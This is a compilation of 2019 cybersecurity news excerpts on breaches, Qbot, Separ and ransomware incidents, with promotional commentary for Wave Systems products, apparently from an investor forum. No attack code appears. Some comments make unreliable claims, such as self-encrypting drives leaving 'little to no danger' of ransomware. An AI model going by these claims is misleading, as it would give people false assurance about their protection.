https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/
If an organization has been breached, it’s more likely to be targeted again
https://www.helpnetsecurity.com/2019/03/05/breach-response-times-improvements/
FireEye released the Mandiant M-Trends 2019 report at the RSA Conference. The report shares statistics and insights gleaned from Mandiant investigations around the globe in 2018.
Key findings
Dwell time decreasing as organizations improve detection capabilities – In 2017, the median duration between the start of an intrusion and the identification by an internal team was 57.5 days. In 2018 this duration decreased to 50.5 days. While organizations are getting better and faster at discovering breaches internally, rather than being notified by an outside source such as law enforcement, there is also a rise in disruptive, ransom, or otherwise immediately visible attacks. The global median dwell time before any detection – external or internal – has also decreased by almost one month – going from 101 days in 2017 to 78 days in 2018. The same measurement was as high as 416 days back in 2011.
Nation-state threat actors are continuing to evolve and change – Through ongoing tracking of threat actors from North Korea, Russia, China, Iran, and other countries, FireEye has observed these actors continually enhancing their capabilities and changing their targets in alignment with their political and economic agendas. Significant investments have provided these actors with more sophisticated tactics, tools, and procedures, with some becoming more aggressive, and others better at hiding and staying persistent for longer periods of time.
Attackers are becoming increasingly persistent – FireEye data provides evidence that organizations which have been victims of a targeted compromise are likely to be targeted again. Global data from 2018 found that 64 percent of all FireEye managed detection and response customers who were previously Mandiant incident response clients were targeted again in the past 19 months by the same or similarly motivated attack group, up from 56 percent in 2017.
Many attack vectors used to get to targets, including M&A activity – Attacker activity touches countries across the globe. Among them, FireEye observed an increase in compromises through phishing attacks during mergers & acquisitions (M&A) activity. Attackers are also targeting data in the cloud, including cloud providers, telecoms, and other service providers, in addition to re-targeting past victim organizations.
Advice for organizations
“We observed an increase in phishing attacks where a compromised email account was used to send phishing emails to additional users in the organization. This is particularly effective in M&A situations, since employees expect communication, sometimes unsolicited, between the organizations,” the company noted.
“Attackers also leveraged access to compromised email accounts to bypass multi-factor authentication. [We] observed bypasses of SMS-based, email-based, and software-based security token (soft-token) multi-factor authentication.”
For organizations involved in the M&A process, FireEye recommends conducting a compromise assessment of the acquisition to attempt to identify any current or previous compromises and a proactive review searching for evidence of potential attacker activity within the acquiring and acquired networks before integrating them.
They also urge them to:
•Audit rights to identify accounts with access to other users’ email
•Disallow the automatic forwarding of email outside the organizations or regularly audit the forwarding rules on their organization’s mail servers to detect evidence of this technique
•Enable audit logging on O365
•Enable multi-factor authentication on O365.
The report also lays out preventative best practices organizations should implement to keep attackers out, as well as common issues that often need to be fixed.
=================================================================
Intrusions being discovered in 50 days?????
How about only known devices being allowed on the network so these unknown devices won't be undiscovered for 50 days!? The unknown devices won't be allowed on the network to even have an intrusion!!!
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs
=================================================================
The article makes mention of software tokens (ie. RSA Securid) being bypassed. The links for Wave VSC 2.0 below really show what two factor authentication should be for a lot more organizations!!
https://www.wavesys.com/products/wave-virtual-smart-card
See the link within this link for more information on RSA Securid
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Qbot malware resurfaces in new attack against businesses
https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.html
This new persistent and difficult-to-detect Qbot version is designed to steal financial information.
The decade-old Qbot financial malware has resurfaced with an improved version in a new attack against businesses that has infected thousands of systems so far. Researchers from data security solutions provider Varonis have uncovered the attack after a customer alerted them about suspicious activity on a computer. The culprit turned out to be an infection with a new strain of Qbot, also known as Qakbot, that was trying to spread to other systems on the network.
Qbot is one of the most successful malware families of the past decade, in part because its source code is available to cybercriminals, so it can be easily modified and extended. The malicious program started out as a Trojan designed to steal online banking credentials, but has received many improvements over the years.
Qbot interestingly is a semi-polymorphic threat because its command-and-control servers re-scramble the code and configuration periodically to evade signature-based antivirus detection. The threat also has worm-like capabilities that allow it to move laterally through corporate networks by brute-forcing Windows domain credentials.
How the new Qbot attack works
In the attack investigated by Varonis, the initial installer or "dropper" was likely delivered as an email attachment with the extension .doc.vbs. VBS is a scripting language that's natively supported on Windows.
If executed, the malicious script downloads the Qbot loader from a command-and-control server using the Windows BITSAdmin command-line tool. Previous Qbot versions used PowerShell for this purpose, but since PowerShell has become a common malware delivery method, its use is closely monitored on enterprise systems. "The loader, which executes the core malware, has multiple versions and is constantly updating even after execution," the Varonis researchers said in their report.
The version received by the victim depends on a parameter hard-coded in the VBS file, so there are possibly different email campaigns targeting different types of users and organizations. Furthermore, Varonis has found loaders that were digitally signed with eight different code-signing certificates that were likely stolen from various entities.
If a file is digitally signed, it does not mean that it's not malicious, just like if a website uses HTTPS, it does not mean that it's not hosting malware or phishing pages. However, digitally signed files trigger less scary warnings in Windows and are sometimes trusted automatically by poorly configured endpoint security agents or file whitelisting solutions.
Once installed, Qbot creates scheduled tasks and adds entries to the system registry to achieve persistence. The malware then starts recording all keystrokes typed by users, steals credentials and authentication cookies saved inside browsers, and injects malicious code into other processes to search for and steal financial-related text strings.
Varonis gained access to one of the command-and-control servers used by the attackers and found logs showing 2,726 unique victim IP addresses. More than 1,700 were located in the U.S., but victims were also found in Canada, the U.K., Germany, France, Brazil, South Africa, India, China and Russia.
Since computers inside an organization typically access the internet through a shared IP address, the researchers believe the number of individually infected systems to be much larger. Also, logs showed that many of the compromised systems had antivirus programs from various vendors installed, highlighting once again Qbot's ability of evading antivirus detection.
=================================================================
Wave Endpoint Monitor and Wave VSC 2.0 are quite unique and powerful when they both are utilized. The highlighted sections in the article above and the links below reveal reasons why the two Wave solutions are fundamental 'must haves' amongst the cybersecurity choices.
==================================================================
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-virtual-smart-card
Cyber espionage warning: The most advanced hacking groups are getting more ambitious
https://www.zdnet.com/article/cyber-espionage-warning-the-most-advanced-hacking-groups-are-getting-more-ambitious/
The top 20 most notorious cyber-espionage operations have increased their activity by a third in recent years - and are looking to conduct more attacks, according to a security company.
The most advanced hacking groups are becoming bolder when conducting campaigns, with the number of organisations targeted by the biggest campaigns rising by almost a third.
A combination of new groups emerging and threat actors developing successful strategies for breaking into networks has seen the average number of organisations targeted by the most active hacking groups rise from 42 between 2015 and 2017 to an average of 55 in 2018.
The figures detailed in Symantec's annual Internet Security Threat Report suggest that the top 20 most prolific hacking groups are targeting more organisations as the attackers gain more confident in their activities.
Groups like Chafer, DragonFly, Gallmaker and others are all conducting highly targeted hacking campaigns as they look to gather intelligence against businesses they think hold valuable information.
Once attackers might have needed the latest zero-days to gain access to corporate networks, but now it's spear-phishing emails laced with malicious content that are most likely to provide attackers with the initial entry they need.
And because these espionage groups are so proficient at what they do, they have well tried-and-tested means of conducting activity once they're inside a network.
"It's like they have steps which they go through, which they know are effective to get into networks, then for lateral movement across networks to get what they want," Orla Cox, director of Symentec's security response unit told ZDNet.
"It makes them more efficient and, for organizations, it makes them harder to spot because a lot of the activity looks like traditional enterprise activity," she added.
In many of the cases detailed in the report, attackers are deploying what Symantec refers to as 'living-off-the-land' tactics: the attackers uses everyday enterprise tools to help them travel across corporate networks and steal data, making the campaigns more difficult to discover.
Not only is the number of targeted campaigns on the rise, but there's a larger variety in the organisations being targeted. Organisations in sectors like utilities, government and financial services have regularly found themselves targets of organised cyber-criminal gangs, but increasingly, these groups are expanding their attacks to new targets.
"Often in the past they'd have a clear focus on one sector, but now we see these campaigns can focus on a wide variety of targets, ranging from telecoms companies, hotels, universities. It's harder to pinpoint exactly what their end goal is," said Cox.
While intelligence gathering remains the key goal of many of these campaigns, some are beginning to expand by also displaying an interest in compromising systems.
This is a particularly worrying trend, because while stealing data in itself is bad enough, attackers with the ability to operate cyber-physical systems could be much worse.
One group Symantec has observed conducting this activity is a hacking operation dubbed Thrip, which expressed particular interest in gaining control of satellite operations — something that could potentially cause major disruption.
In the face of a rise in targeted attacks, governments are increasingly pointing the finger not just at nations but individuals believed to be involved in cyber espionage. For example, the United States named individuals it claims are responsible for conducting cyber attacks: they include citizens of Russia, North Korea, Iran and China. Symantec's report suggests the indictment might disrupt some targeted operations, but it's unlikely that cyber espionage campaigns will be disappearing anytime soon.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Wave VSC 2.0 can prevent a hacker from moving laterally on the network as was happening in this article.
==================================================================
https://www.wavesys.com/malware-protection
Excerpts:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
A further challenge for anti-malware software is that it commonly works at the OS level. It isn’t very good at seeing deeper into the system, where some malware lives. Malware can hide from anti-malware by feeding it false results as it lies lower in the stack.
Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Key Features:
Easy security compliance
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
Ransomware Pretends to Be Proton Security Team Securing Data From Hackers
https://www.bleepingcomputer.com/news/security/ransomware-pretends-to-be-proton-security-team-securing-data-from-hackers/
A recent variant of the GarrantyDecrypt ransomware has been found that pretends to be from the security team for Proton Technologies, the company behind ProtonMail and ProtonVPN.
This ransomware family was found by ransomware researcher Michael Gillespie in October 2018 and while it has never achieved a large-scale distribution like other ransomware, it has seen a steady trickle of victims since it has been released.
From the submissions to ID-Ransomware, you can see a steady stream of users users submitting ransom notes or encrypted files to the service.
In a recent variant discovered once again by Gillespie in February, the developers behind GarrantyDecrypt tried a new tactic of pretending to be the security team for Proton. In this ransom note, named SECURITY-ISSUE-INFO.txt, the developers state that the victim was being attacked by an "outsider" and Proton's SECURE-SERVER service encrypted the data in order to protect it during the attack.
The developers even went as far as putting "PROTON SECURE-SERVER SYSTEMS (c) 2019" copyright statement at the bottom of the note to make it appear more legitimate.
The ransom note goes on to say that Proton's SECURE-SERVER service charges a fee of $780 for securing the files during a 3rd party attack and that a victim needs to pay the fee to decrypt their files.
While I think most people would never fall for this, it is important to reiterate that this is not an email from Proton, Proton did not encrypt your data, and you are a victim of a ransomware.
Unfortunately, there is no way to decrypt this ransomware, so if you have been infected by GarrantyDecrypt you should either copy the encrypted data and a copy of the ransom note to a secure location in the hopes a key will be released in the future or try to restore from a backup.
How to protect yourself from the Ransomware
In order to protect yourself from ransomware it is important that you use good computing habits and security software. The most important step is to always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack.
You should also make sure that you do not have any computers running remote desktop services connected directly to the Internet. Instead place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network.
A good security software solution that incorporates behavioral detections to combat ransomware and not just use signature detections or heuristics is important as well. For example, Emsisoft Anti-Malware and Malwarebytes Anti-Malware both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer.
Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all:
•Backup, Backup, Backup!
•Do not open attachments if you do not know who sent them.
•Do not open attachments until you confirm that the person actually sent you them,
•Scan attachments with tools like VirusTotal.
•Do not connect Remote Desktop Services directly to the Internet. Instead, make sure they can only be accessed by logging into a VPN first.
•Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
•Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs.
•Use hard passwords and never reuse the same password at multiple sites.
•BACKUP!
For a complete guide on ransomware protection, you visit our How to Protect and Harden a Computer against Ransomware article.
=================================================================
SEDs and Wave SED management could help stop this sneaky ransomware!! Wave Endpoint Monitor could help as well! For a list and summaries of all of Wave's outstanding cybersecurity solutions and old but important news (the VSC 2.0 related news is especially important), see the website below.
=================================================================
https://www.wavesys.com/
Will 2019 Be the Year of Blockbuster Cybersecurity Enforcement by the SEC?
https://www.law.com/newyorklawjournal/2019/02/26/will-2019-be-the-year-of-blockbuster-cybersecurity-enforcement-by-the-sec/?slreturn=20190201181543
Excerpts:
Firms that have yet to dedicate sustained attention to their cyber threats and risks may find that the SEC is far more willing to use a stick rather than a carrot to obtain compliance.
After years of admonishing financial institutions and public companies to take cybersecurity more seriously, the U.S. Securities and Exchange Commission (SEC) appears ready to back up its words with investigations and penalties. Starting with Jay Clayton’s confirmation as SEC Chair in 2017, the agency has enhanced its efforts to protect investors and markets from increasingly dangerous and costly cyber threats. Indeed, the SEC’s conduct over the past two years—including creating a dedicated Cyber Unit in its Enforcement Division and by bringing several first-of-their-kind cybersecurity enforcement actions—foretell that the agency is prepared to take an even more aggressive approach in addressing cybersecurity issues among the entities it supervises. As a result, firms that have yet to dedicate sustained attention to their cyber threats and risks may find that the SEC is far more willing to use a stick rather than a carrot to obtain compliance.
Conclusion
The SEC has, in the past, largely taken a softer approach to encouraging compliance in the cyber-security arena, but the agency now appears ready to bring significant enforcement actions for cyber-related missteps. Public companies and entities registered with the SEC would do well to heed the SEC’s admonitions and take a close and careful look at their cybersecurity-related policies and procedures to ensure full compliance.
=================================================================
Better security!! - https://www.wavesys.com/
Deadline passes for companies to comply with New York's cybersecurity regulation
https://investorshub.advfn.com/secure/post_new.aspx?board_id=17
Time’s up for major banks, insurers and many of the companies they work with to comply with a New York State cybersecurity regulation that requires more data protection measures than anywhere else in the country.
The New York State Department of Financial Services Cybersecurity Regulation goes into full effect Friday, two years after officials began to put it in place.
“The Department has provided a two year transitional period to address these risks and expects Covered Entities to have completed a thorough due diligence process on all Third Party Service Providers by March 1, 2019,” the department said in an informational page.
The rules require DFS-covered entities including financial firms, mortgage brokers, charities and Health Maintenance Organizations to use encryption, multi-factor authentication and tighter third party risk assessments, such as penetration tests, to limit outsiders’ access to corporate data. Covered entities also must notify regulators about a data breach within 72 hours and appoint an executive to lead corporate security efforts.
DFS has not provided details about possible penalties for compliance failures.
Many financial firms already have the necessary boxes checked, though numerous legal experts have predicted the regulation will echo throughout the private sector. The rule covers firms and international subsidiaries operating in New York City, along with the rest of the state, requiring firms to meet a higher security baseline.
By requiring third party assessments, penetration tests, and audit trails, the logic goes, lawyers and security practitioners may force their corporate partners to raise their own standards. The European Union’s General Data Protection Regulation, which also includes a 72-hour breach notification stipulation, similarly has forced a corporate security reckoning.
DFS meanwhile has not waited for the regulation to go into final effect to probe other instances of potential negligence or wrongdoing as it relates to security.
The regulator in recent weeks has sent letters to Facebook and mobile app developers after Gov. Andrew Cuomo’s office sought more information about technology companies leveraging user data without consent.
Last year, DFS was among the regulators which ordered Equifax to take remediation steps following the 2017 data breach that compromised information on nearly 150 million people.
==================================================================
The good news for companies out of compliance is that there is a company like Wave that has better security. And other companies carrying solutions that are under par after pen testing could find that they get much better security with Wave!! Stellar encryption and MFA are very important here and is what Wave could be a tremendous help with (see links below)!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/
Microsoft opens top-tier Defender ATP security to Windows 7 PCs
https://www.computerworld.com/article/3342215/microsoft-windows/microsoft-opens-top-tier-defender-atp-security-to-windows-7-pcs.html
Windows Defender ATP, which can detects ongoing attacks on corporate networks and recommend a response, is now available for Windows 7 and 8.1.
Microsoft's Windows Defender Advanced Threat Protection (ATP) service is now available for PCs running Windows 7 and Windows 8.1.
The decision to add devices powered by those operating systems was first announced a year ago. At the time, Microsoft said ATP's Endpoint Detection & Response (EDR) functionality would be available for the older OSes by summer 2018.
Windows Defender ATP is a service that detects ongoing attacks on corporate networks, then follows up to investigate the attack or breach and provides response recommendations and attack remediation. Software baked into Windows 10 detects attacks, while a central management console allows IT administrators to monitor the status of covered devices and react if necessary. Adding the EDR client software to Windows 7 and Windows 8.1 PCs gives enterprise IT the same visibility into those machines as it has had into Windows 10 systems.
Both last year and last week, Microsoft explained the extension of ATP coverage as a way for companies to better protect their environments when they're part way through a Windows 10 migration. "To help customers stay secure while upgrading to Windows 10, we've built an EDR solution for Windows 7 and Windows 8.1 that is simple to deploy and seamless to end-users," wrote Heike Ritter, a security product manager on the ATP team, in a post to a company blog.
Windows Defender ATP is a component within the most expensive Windows 10 licenses, such as those provided by the subscription-based Windows 10 Enterprise E5 or Microsoft 365 E5. (The company touts ATP as the differentiator between those SKUs (stock-selling units) and the tier-lower bundles.) Microsoft now also sells ATP as an add-on to Microsoft 365 E3 - one of those lower-tier subscriptions - for an extra $12 per user per month.
Microsoft put into place the Windows 7 integration just 11 months before the operating system is set to fall off the company's support list. (Windows 8.1 simply doesn't matter; not only was it largely ignored by businesses, its January 2019 user share was only 6% of all Windows PCs.) Given the late date - again, Microsoft originally had aimed for a mid-2018 launch date for inclusion of Windows 7 - the firm may be mostly counting on adoption by customers who will pay for extending Windows 7 support. That additional support, labeled "Windows 7 Extended Security Updates" (ESU), will be sold in one-year increments for up to three years, with prices ranging from $25 to $200 per PC per year.
Because Microsoft wants customers to migrate as many machines as possible to Windows 10's Enterprise - the most expensive of the operating system's editions - it discounts ESU to subscribers of Windows 10 Enterprise and Microsoft 365 Enterprise. Coincidentally, those are the same licenses - their E5 versions, specifically - that are required for Windows Defender ATP. Microsoft may be hoping that ATP's availability will prompt customers to obtain Windows 10 Enterprise or Microsoft 365 Enterprise licenses for their Windows 7 machines now, so that IT can configure the covered PCs now, rather than later, after support runs out.
More information about ATP and Windows 7, including instructions for including Windows 7 PCs in ATP monitoring, is available on Microsoft's website.
=================================================================
It costs an extra $12 a month for Defender ATP as pointed out in the article. Wave solutions can help security and budget conscious organizations. The website below is relatively straightforward, and if thoroughly read contains many clues as to what the picture of successful cybersecurity should look like.
=================================================================
https://www.wavesys.com/
Payroll Provider Gives Extortionists a Payday
https://krebsonsecurity.com/2019/02/payroll-provider-gives-extortionists-a-payday/
Payroll software provider Apex Human Capital Management suffered a ransomware attack this week that severed payroll management services for hundreds of the company’s customers for nearly three days. Faced with the threat of an extended outage, Apex chose to pay the ransom demand and begin the process of restoring service to customers.
Roswell, Ga. based Apex HCM is a cloud-based payroll software company that serves some 350 payroll service bureaus that in turn provide payroll services to small and mid-sized businesses. At 4 a.m. on Tuesday, Feb. 19, Apex was alerted that its systems had been infected with a destructive strain of ransomware that encrypts computer files and demands payment for a digital key needed to unscramble the data.
-see link for more info
The company quickly took all of its systems offline, and began notifying customers that it was trying to remediate a security threat. Over a series of bi-hourly updates, Apex kept estimating that it expected to restore service in a few hours, only to have to walk back those estimates almost every other time a new customer update went out.
Contacted Wednesday by an Apex client who was nervous about being unable to make this week’s payroll for his clients, KrebsOnSecurity reached out to Apex for comment. Ian Oxman, the company’s chief marketing officer, said the ransomware never touched customer data, but instead encrypted and disrupted everything in the company’s computer systems and at its off-site disaster recovery systems.
“We had just recently completed a pretty state-of-the-art disaster recovery plan off-site out and out of state that was mirroring our live system,” Oxman said. “But when the ransomware bomb went off, not only did it go through and infect our own network, it was then immediately picked up in our disaster recovery site, which made switching over to that site unusable.”
Oxman said Apex hired two outside security firms, and by Feb. 20 the consensus among all three was that paying the ransom was the fastest way to get back online. The company declined to specify how much was paid or what strain of ransomware was responsible for the attack.
“We paid the ransom, and it sucked,” Oxman said. “In respect for our clients who needed to get their businesses up and running that was going to be obviously the quicker path.”
Unfortunately for Apex, paying up didn’t completely solve its problems. For one thing, Oxman said, the decryption key they were given after paying the ransom didn’t work exactly as promised. Instead of restoring all files and folders to their pre-encrypted state, the decryption process broke countless file directories and rendered many executable files inoperable — causing even more delays.
“When they encrypt the data, that happens really fast,” he said. “When they gave us the keys to decrypt it, things didn’t go quite as cleanly.”
One of Apex’s older business units — ACA OnDemand — is still offline, but the company is now offering to move customers on that platform over to newer (and more expensive) software-as-a-service systems, and to train those customers on how to use them.
Experts say attacks like the one against Apex HCM are playing out across the world every day, and have turned into a billion-dollar business for cyber thieves. The biggest group of victims are professional services firms, according to a study by NTT Security.
Ransomware victims perhaps in the toughest spot include those offering cloud data hosting and software-as-service, as these businesses are completely unable to serve their customers while a ransomware infestation is active.
The FBI and multiple security firms have advised victims not to pay any ransom demands, as doing so just encourages the attackers and in any case may not result in actually regaining access to encrypted files.
In practice, however, many cybersecurity consulting firms are quietly urging their customers that paying up is the fastest route back to business-as-usual. It’s not hard to see why: Having customer data ransomed or stolen can spell the end of cloud-based business, but just being down for more than a few days can often be just as devastating. As a result, the temptation to simply pay up may become stronger with each passing day — even if the only thing being ransomed is a bunch of desktops and servers.
On Christmas Eve 2018, cloud data hosting firm Dataresolution.net was hit with the Ryuk strain of ransomware. More than a week later on Jan. 2, 2019, this blog reported that the company — which had chosen not to pay the ransom and instead restore everything from backups — was still struggling to bring its systems back online.
One dataresolution.net client said the company didn’t succeed in rebuilding its server or turning over his company’s database stored there until Jan. 9 — 16 days after the ransomware outbreak.
“From my understanding it was another two weeks until all of the clients were rebuilt,” said the customer, who works as an IT manager at a benefits management firm that used dataresolution.net and its now transitioning away from the company. “The vendor never provided any analysis on how it occurred and how they would prevent it from occurring again. Other than different antivirus and not allowing RDP connections to the internet they don’t seem to have put any additional safeguards in place. They did not proactively offer any compensation for the outage. I am in the process of documenting the business financial impact to request a ‘credit’ at the same time as planning on bringing the system in house.”
For its part, Apex is still trying to determine how the ransomware got into its systems.
“That’s where this forensic analysis is still going on,” Oxman said. “For us, the emergency response team literally worked 48 hours straight getting our systems back up, and secondary to that is now trying to figure out what the hell happened and how do we prevent this from happening again. We had just completed a security audit and we were feeling pretty good. Obviously, these cyber hackers found a way in, but I’m sure that’s how every company feels that gets hit.”
Here are a few tips for preventing and dealing with ransomware attacks:
-Patch, early and often: Many ransomware attacks leverage known security flaws in servers and desktops.
-Disable RDP: Short for Remote Desktop Protocol, this feature of Windows allows a system to be remotely administered over the Internet. A ridiculous number of businesses — particularly healthcare providers — get hit with ransomware because they leave RDP open to the Internet and secured with easy-to-guess passwords. And there are a number of criminal services that sell access to brute-forced RDP installations.
-Filter all email: Invest in security systems that can block executable files at the email gateway.
-Isolate mission-critical systems and data: This can be harder than it sounds. It may be worth hiring a competent security firm to make sure this is done right.
-Backup key files and databases: Bear in mind that ransomware can encrypt any network or cloud-based files or folders that are mapped and have been assigned a drive letter. Backing up to a secondary system that is not assigned a drive letter or is disconnected when it’s not backing up data is key. The old “3-2-1” backup rule comes into play here: Wherever possible, keep three backups of your data, on two different storage types, with at least one backup offsite.
-Disable macros in Microsoft Office: Block external content in Office files. Educate users that ransomware very often succeeds only when a user opens Office file attachment sent via email and manually enables Macros.
-Enable controlled folder access: Create rules to disallow the running of executable files in Windows from local user profile folders (App Data, Local App Data, ProgramData, Temp, etc.)
Sites like nomoreransom.org distribute free tools and tutorials that can help some ransomware victims recover files without paying a ransom demand, but those tools often only work with specific versions of a particular ransomware strain.
==================================================================
How can Wave help organizations protect against ransomware attacks?
1. Wave Endpoint Monitor is more encompassing than anti-virus software. It can spot those sneaky attacks.
2. One of Wave VSC 2.0 key features is Remote Desktop Access. RDP is recommended to be disabled in this article probably since it doesn't have 2FA like Wave VSC 2.0.
3. SEDs when initialized by Wave SED management leaves little to no danger of a successful ransomware attack on those SEDs.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Fix Windows Hello errors while creating a PIN on Windows 10
https://www.thewindowsclub.com/windows-10-pin-errors
==================================================================
In addition to the user experience being simple, the setup of the PIN for Wave VSC 2.0 could be simpler than Windows Hello! The above article shows how things can get gnarly in setting up the PIN for Windows Hello.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
92% of organizations rank users as their primary security concern
https://www.helpnetsecurity.com/2019/02/22/users-primary-security-concern/
Cybercrime continues to evolve and become more sophisticated. AI and machine learning are leveraged by many criminal organizations to help them better understand how to improve their attacks and they are now targeting specific industry verticals, organizations and even individuals. Increases in the frequency of ransomware, phishing and crypto jacking attacks were experienced by businesses of nearly every size, vertical and locale.
On average, 81% of organizations had some degree of concern around security issues, according to the results of a new research: What Keeps You Up at Night – The 2019 Report, released by KnowBe4.
When it came to attack vectors, data breaches were the primary concern, with credential compromise coming in as a close second. These two issues go hand-in-hand, as misuse of credentials remains the number one attack tactic in data breaches, according to Verizon’s 2018 Data Breach Investigations Report. Phishing and ransomware ranked next, demonstrating that organizations are still not completely prepared to defend themselves against these relatively “old” attack vectors.
Other key findings from the report include:
•92% of organizations rank users as their primary security concern. And at the same time, security awareness training along with phishing testing topped the list of security initiatives that organizations need to implement.
•Organizations today have a large number of attack vectors to prevent, monitor for, detect, alert and remediate; in terms of attacks, 95 per cent of organizations are most concerned with data breaches.
•Ensuring security is in place to meet GDPR requirements is still a challenge for 64 per cent of organizations, despite the regulation details being out for quite some time.
•Attackers’ utilization of compromised credentials is such a common tactic, 93 per cent of organizations are aware of the problem, but still have lots of work to do to stop it.
•When it comes to resources, 75 per cent of organizations do not have an adequate budget.
“2018 was a prolific year for successful cyberattacks, and many of them were caused by human error,” said Stu Sjouwerman, CEO of KnowBe4. “IT organizations are tasked with establishing and maintaining a layered security defence. The largest concern, as demonstrated again in this report, is employees making errors. Organizations must start with establishing a security culture, and in order to combat the escalation of social engineering, they have to ensure users are trained and tested.”
==================================================================
1. Train employees to keep them from becoming victims of phishing attacks. Result: Not all employees even after training will recognize new and more clever phishing attacks.
Vs.
2. Buy Wave VSC 2.0 solution and have the second factor of authentication (TPM) prevent the hacker from being able to use the phished credentials. Result: Better than #1 (training method).
And 93% of organizations are aware of the compromised credential problem (see article), but still have lots of work to do to stop it. Why not use method #2 for all these organizations!?
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
Hard-to-detect credential-theft malware has infected 1,200 and is still going
https://arstechnica.com/information-technology/2019/02/hard-to-detect-credential-theft-malware-has-infected-1200-and-is-still-going/
Separ's living-off-the-land approach bypasses many antimalware providers.
A deceptively simple malware attack has stolen a wide array of credentials from thousands of computers over the past few weeks and continues to steal more, a researcher warned on Tuesday.
The ongoing attack is the latest wave of Separ, a credential stealer that has been known to exist since at least late 2017, a researcher with security firm Deep Instinct said. Over the past few weeks, the researcher said, Separ has returned with a new version that has proven surprisingly adept at evading malware-detection software and services. The source of its success: a combination of short scripts and legitimate executable files that are used so often for benign purposes that they blend right in. Use of spartan malware that's built on legitimate apps and utilities has come to be called "living off the land," and
it has been used in a variety
of highly effective campaigns over the past few years.
The latest Separ arrives in what appears to be a PDF document. Once clicked, the file runs a chain of other apps and file types that are commonly used by system administrators. An inspection of the servers being used in the campaign show that it, so far, has collected credentials belonging to about 1,200 organizations or individuals. The number of infections continues to rise, which indicates that the spartan approach has been effective in helping it fly under the radar.
"Although the attack mechanism used by this malware is very simple, and no attempt has been made by the attacker to evade analysis, the growth in the number of victims claimed by this malware shows that simple attacks can be very effective," Guy Propper, Deep Instinct's threat intelligence team leader, wrote in a blog post. "The use of scripts and legitimate binaries, in a 'living off the land' scenario, means the attacker successfully evades detection, despite the simplicity of the attack.
In this latest wave, Separ is bundled into a self-extracting executable file that uses an icon to disguise itself as a PDF document. Double clicking the file runs a chain of files that starts with a Visual Basic script. The script, in turn, executes a batch script. The batch script sets up several directories, copies files to them, and then launches a second batch script. The second script opens a decoy image to hide command windows, lowers firewall protections, and saves the results of an ipconfig /all command to a file.
